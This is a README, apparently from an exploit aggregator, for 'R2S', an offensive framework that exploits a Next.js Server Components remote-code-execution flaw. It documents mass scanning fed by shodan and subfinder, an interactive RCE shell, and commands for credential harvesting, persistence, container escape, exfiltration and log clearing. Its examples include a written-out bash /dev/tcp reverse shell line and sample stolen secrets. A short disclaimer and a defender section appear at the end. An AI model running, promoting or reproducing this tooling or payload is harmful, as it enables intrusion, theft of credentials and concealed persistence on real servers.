Share
## https://sploitus.com/exploit?id=49AF76C2-B7C9-568B-AAF6-D0D6E4D15276
# ๐Ÿš€ R2S - Next.js RSC Exploit Framework



![Version](https://img.shields.io/badge/version-4.1.0-blue.svg)
![Python](https://img.shields.io/badge/python-3.6+-green.svg)
![License](https://img.shields.io/badge/license-Educational-red.svg)
![CVE](https://img.shields.io/badge/CVE-2025--55182-critical.svg)

**Advanced Post-Exploitation Framework for Next.js React Server Components RCE**

[Features](#-features) โ€ข [Installation](#-installation) โ€ข [Usage](#-usage) โ€ข [Commands](#-interactive-shell-commands) โ€ข [Examples](#-examples)



---

## ๐Ÿ“‹ Overview

**R2S** is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more.

### ๐ŸŽฏ Key Capabilities

- โœ… **Automated vulnerability scanning** - Mass scan multiple targets
- โœ… **Interactive RCE shell** - Stateful command execution with directory navigation
- โœ… **HTTP-based file transfer** - Upload/download files without base64 limitations
- โœ… **Reverse shell automation** - Try 25+ different reverse shell payloads
- โœ… **Advanced enumeration** - System, network, container, and cloud metadata
- โœ… **Privilege escalation** - Automated privesc vector detection
- โœ… **Credential harvesting** - Extract passwords, keys, tokens, and secrets
- โœ… **Persistence mechanisms** - Maintain access across reboots
- โœ… **Lateral movement** - Discover and pivot to other hosts
- โœ… **Container escape** - Check for Docker/Kubernetes breakout vectors
- โœ… **Data exfiltration** - Extract sensitive files and configurations
- โœ… **Stealth operations** - Clear logs and hide tracks

---

## ๐Ÿ”ฅ Features

### ๐ŸŒ Core Exploitation
- **Mass scanning** with multi-threading support
- **Pipeline mode** for integration with other tools
- **Automatic vulnerability detection** for Next.js RSC
- **Stateful interactive shell** with persistent working directory

### ๐Ÿ“ File Operations
- **HTTP-based upload** - Transfer files to target via wget/curl
- **HTTP-based download** - Exfiltrate files via POST requests
- **No size limitations** - Works with large files (unlike base64 methods)
- **Automatic HTTP server** - Starts/stops as needed

### ๐Ÿ” Reconnaissance & Enumeration
- **System enumeration** - OS, kernel, users, processes
- **Network discovery** - Interfaces, routes, ARP, DNS, listening ports
- **Container detection** - Docker, Kubernetes, LXC identification
- **Cloud metadata** - AWS, GCP, Azure credential extraction
- **Process memory dumping** - Extract secrets from running processes
- **Interesting file discovery** - SUID, writable dirs, backups, configs

### ๐Ÿ” Credential Harvesting
- Environment variables (passwords, API keys, tokens)
- `.env` files and configuration files
- SSH private keys and authorized_keys
- Bash history with sensitive commands
- Database files (SQLite, MySQL dumps)
- Cloud credentials (AWS, Azure, GCP)
- Git credentials and NPM tokens
- Browser data (cookies, login data)
- Docker and Kubernetes secrets

### โฌ†๏ธ Privilege Escalation
- **SUID/SGID binaries** detection
- **Sudo permissions** enumeration
- **Writable system files** (/etc/passwd, /etc/shadow)
- **Docker socket** access checks
- **Linux capabilities** analysis
- **Kernel exploit** suggestions
- **Cron job** enumeration
- **PATH hijacking** opportunities

### ๐Ÿ”„ Post-Exploitation
- **Persistence mechanisms** - Cron jobs, .bashrc, systemd services
- **Advanced persistence** - LD_PRELOAD, systemd timers
- **Port scanning** - Internal network reconnaissance
- **Lateral movement** - SSH key discovery, known_hosts analysis
- **Container escape** - Privileged container checks, capability analysis
- **Data exfiltration** - Automated sensitive data collection
- **Reverse shell automation** - 25+ payload types with auto-retry

### ๐Ÿฅท Stealth & Evasion
- **Log clearing** - Bash history, auth logs, syslog
- **Track covering** - wtmp, lastlog cleanup
- **Session management** - Save and resume sessions

---

## ๐Ÿ› ๏ธ Installation

### Prerequisites
```bash
# Python 3.6 or higher
python3 --version

# Install dependencies
pip3 install requests urllib3
```

### Quick Start
```bash
# Clone or download the tool
cd r2s-main

# Make executable (optional)
chmod +x r2s_enhanced.py

# Run the tool
python3 r2s_enhanced.py -h
```

---

## ๐Ÿš€ Usage

### Basic Syntax
```bash
python3 r2s_enhanced.py [OPTIONS]
```

### Command-Line Options
| Option | Description | Default |
|--------|-------------|---------|
| `-u, --url` | Single target URL | - |
| `-l, --list` | File containing list of URLs | - |
| `-c, --cmd` | Initial command to execute | `id` |
| `-t, --threads` | Number of scanning threads | 30 |
| `-p, --proxy` | HTTP proxy (e.g., `http://127.0.0.1:8080`) | - |
| `-v, --verbose` | Enable verbose output | False |
| `--http-port` | HTTP server port for file transfer | 8000 |

### Input Methods

#### 1. Single Target
```bash
python3 r2s_enhanced.py -u http://target.com
```

#### 2. Multiple Targets (File)
```bash
python3 r2s_enhanced.py -l targets.txt -t 50
```

#### 3. Pipeline Mode (stdin)
```bash
cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py
```

---

## ๐Ÿ’ป Interactive Shell Commands

Once you gain RCE access, you'll enter an interactive shell with these commands:

### ๐Ÿ“‚ File Transfer
```bash
upload      # Upload file to target
download    # Download file from target
```

### ๐Ÿงญ Navigation
```bash
cd                        # Change working directory
pwd                                  # Print working directory
```

### ๐Ÿ” Enumeration
```bash
enum                                 # Complete system enumeration
privesc                              # Privilege escalation checks
harvest                              # Credential harvesting
portscan                         # Scan internal network ports
memdump [pid]                        # Dump process memory for secrets
```

### ๐ŸŽฏ Post-Exploitation
```bash
lateral                              # Lateral movement opportunities
escape                               # Container escape vectors
exfil [type]                         # Exfiltrate data (env/config/keys/db/logs/all)
reverse                # Try multiple reverse shell payloads
```

### ๐Ÿ”’ Persistence
```bash
persist                              # Add basic persistence
advpersist                           # Add advanced persistence
```

### ๐Ÿฅท Stealth
```bash
stealth                              # Clear logs and hide tracks
```

### ๐Ÿ’พ Session Management
```bash
save                                 # Save current session
help, ?                              # Show help message
exit, quit                           # Exit interactive shell
```

### ๐Ÿ–ฅ๏ธ System Commands
Execute any shell command directly:
```bash
whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd
```

---

## ๐Ÿ“š Examples

### Example 1: Basic Exploitation
```bash
$ python3 r2s_enhanced.py -u http://vulnerable-app.com

    _   __          __  ____            
   / | / /__  _  __/ /_/ __ \________   
  /  |/ / _ \| |/_/ __/ /_/ / ___/ _ \  
 / /|  /  __/>  > CREDIT( G4rxd )

[*] Loaded 1 targets. Starting scan with 30 threads...
[*] Payload Command: id

[VULN] http://vulnerable-app.com >>> RCE SUCCESS
       Output: uid=1000(node) gid=1000(node) groups=1000(node)

[+] Stateful Interactive RCE shell started. Type 'help' for commands.
[*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
[*] New features: memdump, lateral, escape, exfil, advpersist, reverse

[+] HTTP server started on 192.168.1.100:8000

next-rce:/app$
```

### Example 2: System Enumeration
```bash
next-rce:/app$ enum

[*] Starting automated enumeration...

============================================================
[*] System Info
============================================================
Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="22.04.3 LTS (Jammy Jellyfish)"

============================================================
[*] Current User
============================================================
node
uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)

============================================================
[*] Container Detection
============================================================
12:devices:/docker/a1b2c3d4e5f6
11:cpuset:/docker/a1b2c3d4e5f6
[Docker container detected]

...
```

### Example 3: File Transfer
```bash
# Upload a file
next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
[*] Uploading /tmp/exploit.sh (2048 bytes) via HTTP...
[+] Upload successful!
    -rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh

# Download a file
next-rce:/app$ download /etc/passwd ./passwd.txt
[*] Downloading /etc/passwd via HTTP...
[+] Download successful! (1523 bytes)
    Saved to: ./passwd.txt
```

### Example 4: Credential Harvesting
```bash
next-rce:/app$ harvest

[*] Harvesting credentials...

[*] Environment Variables:
DATABASE_PASSWORD=super_secret_pass
API_KEY=sk-1234567890abcdef
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

[*] .env Files:
/app/.env
/app/.env.production
/var/www/.env.local

[*] SSH Keys:
/home/node/.ssh/id_rsa
/root/.ssh/id_rsa

...
```

### Example 5: Reverse Shell
```bash
next-rce:/app$ reverse 192.168.1.100 4444

[*] Starting reverse shell attempts to 192.168.1.100:4444
[!] Make sure you have a listener running: nc -lvnp 4444

[*] Trying 25 different reverse shell payloads...

[1/25] Trying Bash TCP... โœ“ Executed
[?] Did you receive a connection? (y/n/s to stop): y

[+] SUCCESS! Reverse shell established using: Bash TCP
[*] Payload: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
```

### Example 6: Mass Scanning
```bash
$ cat targets.txt
http://app1.example.com
http://app2.example.com
http://app3.example.com

$ python3 r2s_enhanced.py -l targets.txt -t 50

[*] Loaded 3 targets. Starting scan with 50 threads...

[VULN] http://app1.example.com >>> RCE SUCCESS
[VULN] http://app3.example.com >>> RCE SUCCESS

[*] Scan completed.
```

### Example 7: Privilege Escalation Check
```bash
next-rce:/app$ privesc

[*] Checking privilege escalation vectors...

[*] SUID Binaries:
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

[*] Sudo Permissions:
User node may run the following commands:
    (ALL : ALL) NOPASSWD: /usr/bin/docker

[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock

[*] Docker Group:
In docker group - EXPLOITABLE!

...
```

### Example 8: Container Escape
```bash
next-rce:/app$ escape

[*] Checking container escape vectors...

[*] Container Type:
12:devices:/docker/a1b2c3d4e5f6

[*] Privileged Container:
PRIVILEGED

[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock

[*] Capabilities:
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
[Full capabilities - container is privileged]

...
```

---

## ๐Ÿ”ง Advanced Features

### Reverse Shell Payloads
The tool includes **25+ reverse shell payloads** across multiple languages and techniques:
- Bash (TCP, UDP, exec variants)
- Netcat (traditional, mkfifo, OpenBSD)
- Python/Python3 (socket, pty)
- Perl (multiple variants)
- PHP (exec, system, passthru)
- Ruby (socket variants)
- Node.js (child_process, socket)
- Socat, Telnet, AWK
- Golang, OpenSSL

### Cloud Metadata Extraction
Automatically detects and extracts credentials from:
- **AWS** - IAM roles, security credentials
- **GCP** - Service account tokens
- **Azure** - Instance metadata
- Environment variables with cloud credentials

### Container Detection
Identifies and analyzes:
- Docker containers
- Kubernetes pods
- LXC containers
- Privileged vs unprivileged
- Available escape vectors

---

## โš ๏ธ Legal Disclaimer

**FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY**

This tool is provided for educational purposes and authorized penetration testing only. Usage of this tool for attacking targets without prior mutual consent is illegal. The author is not responsible for any misuse or damage caused by this tool.

**Requirements for legal use:**
- โœ… Written authorization from the target owner
- โœ… Defined scope and rules of engagement
- โœ… Professional penetration testing engagement
- โŒ Unauthorized access to systems
- โŒ Malicious intent or damage

---

## ๐Ÿ›ก๏ธ Detection & Defense

### For Defenders

**Detection:**
- Monitor for unusual `Next-Action` headers
- Look for multipart/form-data POST requests to non-existent endpoints
- Check for base64-encoded command output in error responses
- Monitor for `child_process.execSync` in Next.js logs

**Mitigation:**
- Update Next.js to the latest patched version
- Implement Web Application Firewall (WAF) rules
- Restrict server-side code execution
- Monitor and log all RSC requests
- Implement proper input validation

---

## ๐Ÿ“Š Version History

### v4.1.0 (Current) - Enhanced Edition
- โœ… Added reverse shell automation (25+ payloads)
- โœ… Added memory dumping capabilities
- โœ… Added lateral movement discovery
- โœ… Added container escape checks
- โœ… Added data exfiltration automation
- โœ… Added advanced persistence mechanisms
- โœ… Improved HTTP file transfer
- โœ… Enhanced enumeration features
- โœ… Better error handling and UX

### v4.0.0 - Post-Exploitation Framework
- โœ… HTTP-based file transfer
- โœ… Persistence mechanisms
- โœ… Port scanner
- โœ… Privilege escalation checks
- โœ… Network enumeration
- โœ… Credential harvesting
- โœ… Session management
- โœ… Automated enumeration
- โœ… Stealth features

### v3.0.0 - Interactive Shell
- Stateful shell with directory navigation
- Basic file transfer (base64)
- Improved error handling

---

## ๐Ÿค Contributing

Contributions are welcome! Please ensure all contributions are for educational and defensive security purposes.

---

## ๐Ÿ‘จโ€๐Ÿ’ป Author

**G4rxd**

---

## ๐Ÿ™ Credits

- CVE-2025-55182 Discovery Team
- Next.js Security Research Community
- Open Source Security Tools Community

---

## ๐Ÿ“„ License

This project is licensed for **educational and authorized testing purposes only**.

---



**โšก Happy Ethical Hacking! โšก**

*Remember: With great power comes great responsibility.*